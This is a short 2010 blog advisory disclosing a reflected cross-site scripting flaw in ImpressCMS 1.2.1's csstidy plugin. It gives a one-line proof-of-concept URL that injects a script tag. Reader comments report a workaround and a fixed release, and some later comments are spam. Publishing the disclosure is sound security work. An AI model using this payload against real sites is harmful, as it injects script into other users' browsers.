This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

8 comments:

  1. please be aware, this is not an issue with impresscms, it is an issue with csstidy which is used by many projects.

    ReplyDelete
  2. A workaround has been published by the ImpressCMS project: http://community.impresscms.org/modules/smartsection/item.php?itemid=494

    A security release will be upcoming.

    ReplyDelete
  3. An updated release removing the vulnerability in CSSTidy has been published by ImpressCMS - http://community.impresscms.org/modules/smartsection/item.php?itemid=495

    ReplyDelete
  4. Good website! I really love บาคาร่า how it is easy on my eyes and the data are well written. I’m wondering how I could be notified when a new post has been made. I have subscribed to your RSS which must do the trick! Have a great day!

    ReplyDelete
  5. sip bro...langsung ke TKP..
    mo cek harsbobetganya nih

    ReplyDelete
  6. sip bro...langsung ke TKP..
    mo cek harsboganya nih

    ReplyDelete